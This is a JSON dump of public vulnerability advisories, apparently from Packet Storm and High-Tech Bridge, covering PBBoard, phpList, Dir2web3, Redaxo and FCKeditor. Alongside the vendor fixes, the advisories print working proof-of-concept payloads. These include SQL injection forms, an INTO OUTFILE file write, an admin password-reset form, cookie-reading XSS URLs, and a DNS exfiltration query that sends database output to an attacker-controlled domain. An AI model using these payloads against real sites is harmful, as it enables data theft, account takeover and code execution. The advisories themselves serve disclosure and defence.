{"packetstorm": [{"lastseen": "2016-12-05T22:20:16", "description": "", "cvss3": {}, "published": "2012-08-09T00:00:00", "type": "packetstorm", "title": "PBBoard 2.1.4 SQL Injection / Improper Authentication / Broken Access Control", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-4036", "CVE-2012-4034", "CVE-2012-4035", "CVE-2012-1216"], "modified": "2012-08-09T00:00:00", "id": "PACKETSTORM:115377", "href": "https://packetstormsecurity.com/files/115377/PBBoard-2.1.4-SQL-Injection-Improper-Authentication-Broken-Access-Control.html", "sourceData": "`Advisory ID: HTB23101 \nProduct: PBBoard \nVendor: www.pbboard.com \nVulnerable Version(s): 2.1.4 and probably prior \nTested Version: 2.1.4 \nVendor Notification: July 18, 2012 \nPublic Disclosure: August 8, 2012 \nVulnerability Type: SQL Injection [CWE-89], Improper Authentication [CWE-287], Improper Access Control [CWE-284] \nCVE References: CVE-2012-4034, CVE-2012-4035, CVE-2012-4036 \nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C) \nSolution Status: Fixed by Vendor \nRisk Level: High \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in PBBoard, which can be exploited to perform SQL injection attacks, change password of arbitrary user and create arbitrary files in folder of the vulnerable application. \n \n \n1) Multiple SQL Injections in PBBoard: CVE-2012-4034 \n \n1.1 Input passed via the \"username\" POST parameter to /index.php (when \"id\", \"member\" and \"start\" parameters are set, and \"page\" is set to \"send\") is not properly sanitised before being used in a SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. 
\n \nThe following PoC (Proof of Concept) demonstrates the vulnerability: \n \n \n<form action=\"http://[host]/index.php?id=1&member=1&page=send&start=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"username\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n \n \n1.2 Input passed via the \"email\" POST parameter to /index.php (when \"send_active_code\" parameter is set, and \"page\" is set to \"forget\") is not properly sanitised before being used in a SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n \nThe following PoC demonstrates the vulnerability: \n \n \n<form action=\"http://[host]/index.php?page=forget&send_active_code=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"email\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n \n \n1.3 Input passed via the \"password\" POST parameter to /index.php (when \"password_check\" and \"id\" parameters are set, and \"page\" is set to \"forum_archive\") is not properly sanitised before being used in a SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. 
\n \nThe following PoC demonstrates the vulnerability: \n \n \n<form action=\"http://[host]/index.php?page=forum_archive&password_check=1&id=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"password\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n \n \n1.4 Input passed via the \"section\" POST parameter to /index.php (when \"move\" and \"subject_id\" parameters are set, and \"page\" is set to \"management\") is not properly sanitised before being used in a SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n \nThe following PoC demonstrates the vulnerability: \n \n \n<form action=\"http://[host]/index.php?page=management&move=1&subject_id=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"section\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n \n \n1.5 Input passed via the \"section_id\" POST parameter to /index.php (when \"startdeleteposts\" and \"do_replys\" parameters are set, and \"page\" is set to \"managementreply\") is not properly sanitised before being used in a SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. 
\n \nThe following PoC demonstrates the vulnerability: \n \n \n<form action=\"http://[host]/index.php?page=managementreply&startdeleteposts=1&do_replys=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"section_id\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \"> \n<input type=\"hidden\" name=\"check[]\" value=\"1\"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n \n \n1.6 Input passed via the \"member_id\" POST parameter to /index.php (when \"forget\" parameter is set, and \"page\" is set to \"new_password\") is not properly sanitised before being used in a SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n \nThe following PoC demonstrates the vulnerability: \n \n \n<form action=\"http://[host]/index.php?page=new_password&forget=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"member_id\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \"> \n<input type=\"hidden\" name=\"new_password\" value=\"1\"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n \n \n1.7 Input passed via the \"subjectid\" POST parameter to /index.php (when \"start\" parameter is set, and \"page\" is set to \"tags\") is not properly sanitised before being used in a SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n \nThe following PoC demonstrates the vulnerability: \n \n \n<form action=\"http://[host]/index.php?page=tags&start=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"subjectid\" value=\"' union select '<? 
php_code ?>',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 INTO OUTFILE '../../../path/to/site/file.php' -- \"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n \n \nSuccessful exploitation of the above-mentioned vulnerabilities (1.1 - 1.7) requires that \"magic_quotes_gpc\" is set to \"off\". SQL injection in POST request can be also exploited with a FireFox browser equipped with Tamper Data plugin. \n \n \n2) Improper Authentication in PBBoard: CVE-2012-4035 \n \nPBBoard permits to change password of any board member due to absence of any verification of user-supplied \"member_id\" POST parameter in the password change script. \n \nThe following PoC changes password for the user with ID=1 (forum administrator): \n \n \n<form action=\"http://[host]/index.php?page=new_password&forget=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"member_id\" value=\"1\"> \n<input type=\"hidden\" name=\"new_password\" value=\"new_password\"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n \n \n \n3) Improper Access Control in PBBoard: CVE-2012-4036 \n \nInput passed via the \"xml_name\" POST parameter to /admin.php (when \"export\" and \"export_writing\" parameters are set, and \"page\" parameter is set to \"addons\") is not properly sanitised before being used as a name of a newly created file. \n \nAn attacker can create an arbitrary .php file and potentially execute arbitrary PHP code on vulnerable system depending on server configuration. \n \nThe following PoC will create a file located at: http://[host]/addons/file.php that will display result of phpinfo() function execution: \n \n \n<form action=\"http://[host]/admin.php?page=addons&export=1&export_writing=1&xml_name=file.php\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"context\" value='<? 
phpinfo(); ?>'> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n \n \nSuccessful exploitation of this vulnerability requires administrative privileges, however can be also exploited via CSRF vector (CVE-2012-1216). The CSRF vulnerability has not been patched by the Vendor Notification date. \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nApply 5-8-2012 Security Patch \n \nMore Information: \nhttp://www.pbboard.com/forums/t10352.html \nhttp://www.pbboard.com/forums/t10353.html \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23101 - https://www.htbridge.com/advisory/HTB23101 - Multiple vulnerabilities in PBBoard. \n[2] PBBoard - http://www.pbboard.com - PBBoard is a free flat-forum bulletin board software. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. 
\n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/115377/pbboard-sqlbypass.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:23:02", "description": "", "cvss3": {}, "published": "2012-08-09T00:00:00", "type": "packetstorm", "title": "phpList 2.10.18 Cross Site Scripting / SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-3952", "CVE-2012-3953"], "modified": "2012-08-09T00:00:00", "id": "PACKETSTORM:115378", "href": "https://packetstormsecurity.com/files/115378/phpList-2.10.18-Cross-Site-Scripting-SQL-Injection.html", "sourceData": "`Advisory ID: HTB23100 \nProduct: phpList \nVendor: phpList Ltd \nVulnerable Version(s): 2.10.18 and probably prior \nTested Version: 2.10.18 \nVendor Notification: July 11, 2012 \nPublic Disclosure: August 8, 2012 \nVulnerability Type: Cross-Site Scripting [CWE-79], SQL Injection [CWE-89] \nCVE References: CVE-2012-3952, CVE-2012-3953 \nCVSSv2 Base Scores: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N), 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) \nSolution Status: Fixed by Vendor \nRisk Level: Medium \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab has discovered multiple vulnerabilities in phpList, which can be exploited to perform Cross-Site Scripting (XSS) and SQL Injection attacks against the vulnerable application. \n \n \n1) Cross-Site Scripting (XSS) in phpList: CVE-2012-3952 \n \nInput passed via the \"unconfirmed\" GET parameter to /admin/index.php (when \"page\" is set to \"user\") is not properly sanitised before being returned to the user. \n \nThis can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website. 
\n \nThe following PoC (Proof of Concept) demonstrates the vulnerability: \n \n \nhttp://[host]/admin/?page=user&find=1&unconfirmed=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \n \n \n \n2) SQL Injection in phpList: CVE-2012-3953 \n \nInput passed via the \"delete\" GET parameter to /admin/index.php (when \"page\" is set to \"editattributes\") is not properly sanitised before being used in SQL query. \n \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. However successful exploitation of this vulnerability requires administrator's privileges. \n \n \nThe following PoC demonstrates vulnerability exploitation under administrator's account: \n \n \nhttp://[host]/admin/?page=editattributes&id=1&delete=1 union select version() -- \n \n \n \nAlternative exploitation of the SQL injection can be performed via XSRF vector and does not require administrative privileges. The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP address for `version()` (or any other sensitive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n \n \nhttp://[host]/admin/?page=editattributes&id=1&delete=1 union select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))) -- \n \n \n \nSecond alternative is to exploit this SQL injection vulnerability also via XSRF vector, but to perform XSS attack against logged-in administrator. 
The following PoC code will simply display administrator cookies: \n \n \nhttp://[host]/admin/?page=editattributes&id=1&delete=1 union select char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59,60,47,115,99,114,105,112,116,62) -- \n \n \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpgrade to phpList 2.10.19 \n \nMore Information: \nhttp://www.phplist.com/?lid=579 \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23100 - https://www.htbridge.com/advisory/HTB23100 - Cross-Site Scripting (XSS) in phpList. \n[2] phpList - http://www.phplist.com - phpList is the world's most popular open source email campaign manager. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. 
\n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/115378/phplist21018-sqlxss.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:25:26", "description": "", "cvss3": {}, "published": "2012-08-05T00:00:00", "type": "packetstorm", "title": "Dir2web3 3.0 SQL Injection / Information Disclosure", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-4069", "CVE-2012-4070"], "modified": "2012-08-05T00:00:00", "id": "PACKETSTORM:115301", "href": "https://packetstormsecurity.com/files/115301/Dir2web3-3.0-SQL-Injection-Information-Disclosure.html", "sourceData": "`Title: \n====== \nDir2web3 Multiple Vulnerabilities \n \nDate: \n===== \n05/08/2012 \n \nAuthor: \n======= \nDaniel Correa (http://www.sinfocol.org/) \n \nVulnerable software: \n==================== \nDir2web v3.0 (http://www.dir2web.it/) \n \nCVE: \n==== \nCVE-2012-4069 \nCVE-2012-4070 \n \nDetails: \n======== \nThere are two vulnerabilities identified on Dir2web v3.0: \n \nInformation disclosure (CVE-2012-4069): \nDatabase folder is public and it is not protected via .htaccess. An attacker \ncan download the entire database and look for hidden pages on the website. \n \nSQL Injection (CVE-2012-4070): \nPreg_match function is not enough to protect GET/POST parameters. An \nattacker \ncan easily make a SQL Injection over the application. \n \nExploit: \n======== \nInformation disclosure: \nhttp://site/_dir2web/system/db/website.db \n \nSQL Injection: \nhttp://site/index.php?wpid=homepage&oid=6a303a0aaa' OR id > 0-- - \n \nPatch: \n====== \nInformation disclosure: \nCreate .htaccess file on _dir2web folder with the following content: \norder deny,allow \ndeny from all \n \nSQL Injection: \nFix the regular expression in dispatcher.php file located on \n_dir2web/system/src folder. 
\n \nReplace: \n'/[a-zA-Z0-9]{10}/' \nWith: \n'/^[a-zA-Z0-9]{10}$/' \n \nTimeline: \n========= \n13/07/2012: Vendor contacted \n25/07/2012: CERT contacted \n27/07/2012: CVE assigned \n05/08/2012: Vulnerability published on Bugtraq \n \n-- \nRegards, \nDaniel Correa \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/115301/dir2web3-sqldisclose.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:16:09", "description": "", "published": "2012-07-25T00:00:00", "type": "packetstorm", "title": "Redaxo 4.4 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-3869"], "modified": "2012-07-25T00:00:00", "id": "PACKETSTORM:115009", "href": "https://packetstormsecurity.com/files/115009/Redaxo-4.4-Cross-Site-Scripting.html", "sourceData": "`Advisory ID: HTB23098 \nProduct: Redaxo \nVendor: Redaxo team \nVulnerable Version(s): 4.4 and probably prior \nTested Version: 4.4 \nVendor Notification: 4 July 2012 \nVendor Patch: 23 July 2012 \nPublic Disclosure: 25 July 2012 \nVulnerability Type: Cross-Site Scripting (XSS) \nCVE Reference: CVE-2012-3869 \nCVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) \nSolution Status: Fixed by Vendor \nRisk Level: Medium \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab has discovered vulnerability in Redaxo, which can be exploited to perform Cross-Site Scripting (XSS) attacks. \n \n \n1) Cross-Site Scripting (XSS) in Redaxo: CVE-2012-3869 \n \n1.1 Input passed via the \"subpage\" GET parameter to /redaxo/index.php (when \"page\" is set to \"user\" or \"template\") is not properly sanitised before being returned to the user. 
\n \nThis can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website. \n \nThe following PoC (Proof of Concept) demonstrates the vulnerability: \n \n \nhttp://[host]/redaxo/index.php?page=user&subpage=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \nhttp://[host]/redaxo/index.php?page=template&subpage=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nApply vendor's patch: http://www.redaxo.org/files/sicherheitsupdate_4_3_und_4_4.zip \nMore Information: \nhttp://www.redaxo.org/de/download/sicherheitshinweise/ \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23098 - https://www.htbridge.com/advisory/HTB23098 - Cross-Site Scripting (XSS) in Redaxo. \n[2] Redaxo - http://www.redaxo.org/ - PHP MySQL Open Source Content Management System. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. 
\n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/115009/redaxo-xss.txt"}, {"lastseen": "2016-12-05T22:13:57", "description": "", "cvss3": {}, "published": "2014-06-03T00:00:00", "type": "packetstorm", "title": "FCKeditor 2.6.10 Cross Site Scripting", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-4000"], "modified": "2014-06-03T00:00:00", "id": "PACKETSTORM:126902", "href": "https://packetstormsecurity.com/files/126902/FCKeditor-2.6.10-Cross-Site-Scripting.html", "sourceData": "`Class Cross-Site Scripting \nRemote Yes \nPublished 2nd June 2014 \nCredit Robin Bailey of Dionach (vulns@dionach.com) \nVulnerable FCKeditor <= 2.6.10 \n \nFCKeditor is prone to a reflected cross-site scripting (XSS) vulnerability due to inadequately sanitised user input. An attacker may leverage this issue to run JavaScript in the context of a victim's browser. \n \nFCKeditor 2.6.10 is known to be vulnerable; older versions may also be vulnerable. \n \nNote that this issue is related to CVE-2012-4000, which was a cross-site scripting vulnerability in the values of the textinputs[] array passed to the spellchecker.php page. To resolve this issue the values of this array were encoded with htmlspecialchars() before being output to the page; however the array keys were still echoed unencoded. \n \nPoC: \n \nPOST http://[target]/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php \ntextinputs[1</script><script>alert(document.cookie);//</script>]=zz \n \nThe vendor was notified of this issue, and FCKeditor 2.6.11 was released to address this vulnerability. 
See the following vendor announcement: \n \nhttp://ckeditor.com/blog/FCKeditor-2.6.11-Released \n \nTimeline: \n \n28/05/2014 Vulnerability identified \n28/05/2014 Initial vendor contact \n28/05/2014 Vendor response to contact \n28/05/2014 Vulnerability disclosed to vendor \n29/05/2014 Vendor confirms vulnerability \n02/06/2014 Vendor releases patch \n02/06/2014 Public disclosure of vulnerability \n \n______________________________________________________________________ \n \nDisclaimer: This e-mail and any attachments are confidential. \n \nIt may contain privileged information and is intended for the named \naddressee(s) only. It must not be distributed without Dionach Ltd consent. \nIf you are not the intended recipient, please notify the sender immediately and destroy this e-mail. \n \nAny unauthorised copying, disclosure or distribution of the material in this e-mail is strictly forbidden. Unless expressly stated, opinions in this e-mail are those of the individual sender, and not of Dionach Ltd. \n \nDionach Ltd, Greenford House, London Road, Wheatley, Oxford OX33 1JH Company Registration No. 03908168, VAT No. GB750661242 \n \n______________________________________________________________________ \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126902/fckeditor2610-xss.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "htbridge": [{"lastseen": "2020-12-24T11:33:44", "description": "High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in PBBoard, which can be exploited to perform SQL injection attacks, change password of arbitrary user and create arbitrary files in folder of the vulnerable application. 
\n \n1) Multiple SQL Injections in PBBoard: CVE-2012-4034 \n1.1 Input passed via the \"username\" POST parameter to /index.php (when \"id\", \"member\" and \"start\" parameters are set, and \"page\" is set to \"send\") is not properly sanitised before being used in a SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \nThe following PoC (Proof of Concept) demonstrates the vulnerability: \n<form action=\"http://[host]/index.php?id=1&member=1&page=send&start=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"username\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n1.2 Input passed via the \"email\" POST parameter to /index.php (when \"send_active_code\" parameter is set, and \"page\" is set to \"forget\") is not properly sanitised before being used in a SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \nThe following PoC demonstrates the vulnerability: \n<form action=\"http://[host]/index.php?page=forget&send_active_code=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"email\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n1.3 Input passed via the \"password\" POST parameter to /index.php (when \"password_check\" and \"id\" parameters are set, and \"page\" is set to \"forum_archive\") is not properly sanitised before being used in a SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. 
\nThe following PoC demonstrates the vulnerability: \n<form action=\"http://[host]/index.php?page=forum_archive&password_check=1&id=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"password\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n1.4 Input passed via the \"section\" POST parameter to /index.php (when \"move\" and \"subject_id\" parameters are set, and \"page\" is set to \"management\") is not properly sanitised before being used in a SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \nThe following PoC demonstrates the vulnerability: \n<form action=\"http://[host]/index.php?page=management&move=1&subject_id=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"section\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n1.5 Input passed via the \"section_id\" POST parameter to /index.php (when \"startdeleteposts\" and \"do_replys\" parameters are set, and \"page\" is set to \"managementreply\") is not properly sanitised before being used in a SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. 
\nThe following PoC demonstrates the vulnerability: \n<form action=\"http://[host]/index.php?page=managementreply&startdeleteposts=1&do_replys=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"section_id\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \"> \n<input type=\"hidden\" name=\"check[]\" value=\"1\"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n1.6 Input passed via the \"member_id\" POST parameter to /index.php (when \"forget\" parameter is set, and \"page\" is set to \"new_password\") is not properly sanitised before being used in a SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \nThe following PoC demonstrates the vulnerability: \n<form action=\"http://[host]/index.php?page=new_password&forget=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"member_id\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \"> \n<input type=\"hidden\" name=\"new_password\" value=\"1\"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n1.7 Input passed via the \"subjectid\" POST parameter to /index.php (when \"start\" parameter is set, and \"page\" is set to \"tags\") is not properly sanitised before being used in a SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \nThe following PoC demonstrates the vulnerability: \n<form action=\"http://[host]/index.php?page=tags&start=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"subjectid\" value=\"' union select '<? 
php_code ?>',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 INTO OUTFILE '../../../path/to/site/file.php' -- \"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \nSuccessful exploitation of the above-mentioned vulnerabilities (1.1 - 1.7) requires that \"magic_quotes_gpc\" is set to \"off\". SQL injection in POST request can be also exploited with a FireFox browser equipped with Tamper Data plugin. \n \n2) Improper Authentication in PBBoard: CVE-2012-4035 \nPBBoard permits to change password of any board member due to absence of any verification of user-supplied \"member_id\" POST parameter in the password change script. \nThe following PoC changes password for the user with ID=1 (forum administrator): \n<form action=\"http://[host]/index.php?page=new_password&forget=1\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"member_id\" value=\"1\"> \n<input type=\"hidden\" name=\"new_password\" value=\"new_password\"> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \n \n3) Code Injection in PBBoard: CVE-2012-4036 \nInput passed via the \"xml_name\" POST parameter to /admin.php (when \"export\" and \"export_writing\" parameters are set, and \"page\" parameter is set to \"addons\") is not properly sanitised before being used as a name of a newly created file. \nAn attacker can create an arbitrary .php file and potentially execute arbitrary PHP code on vulnerable system depending on server configuration. \nThe following PoC will create a file located at: http://[host]/addons/file.php that will display result of phpinfo() function execution: \n<form action=\"http://[host]/admin.php?page=addons&export=1&export_writing=1&xml_name=file.php\" method=\"post\" name=\"main\" id=\"main\"> \n<input type=\"hidden\" name=\"context\" value='<? 
phpinfo(); ?>'> \n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \n</form> \nSuccessful exploitation of this vulnerability requires administrative privileges, however can be also exploited via CSRF vector (CVE-2012-1216). The CSRF vulnerability has not been patched by the Vendor Notification date. \n", "edition": 2, "cvss3": {}, "published": "2012-07-18T00:00:00", "type": "htbridge", "title": "Multiple vulnerabilities in PBBoard", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1216", "CVE-2012-4034", "CVE-2012-4035", "CVE-2012-4036"], "modified": "2012-08-07T00:00:00", "id": "HTB23101", "href": "https://www.htbridge.com/advisory/HTB23101", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P/"}}, {"lastseen": "2020-12-24T11:33:46", "description": "High-Tech Bridge Security Research Lab has discovered multiple vulnerabilities in phpList, which can be exploited to perform Cross-Site Scripting (XSS) and SQL Injection attacks against the vulnerable application. \n \n1) Cross-Site Scripting (XSS) in phpList: CVE-2012-3952 \nInput passed via the \"unconfirmed\" GET parameter to /admin/index.php (when \"page\" is set to \"user\") is not properly sanitised before being returned to the user. \nThis can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website. 
\nThe following PoC (Proof of Concept) demonstrates the vulnerability: \nhttp://[host]/admin/?page=user&find=1&unconfirmed=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \n \n2) SQL Injection in phpList: CVE-2012-3953 \nInput passed via the \"delete\" GET parameter to /admin/index.php (when \"page\" is set to \"editattributes\") is not properly sanitised before being used in SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. However successful exploitation of this vulnerability requires administrator's privileges. \n \nThe following PoC demonstrates vulnerability exploitation under administrator's account: \nhttp://[host]/admin/?page=editattributes&id=1&delete=1 union select version() -- \n \nAlternative exploitation of the SQL injection can be performed via XSRF vector and does not require administrative privileges. The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP 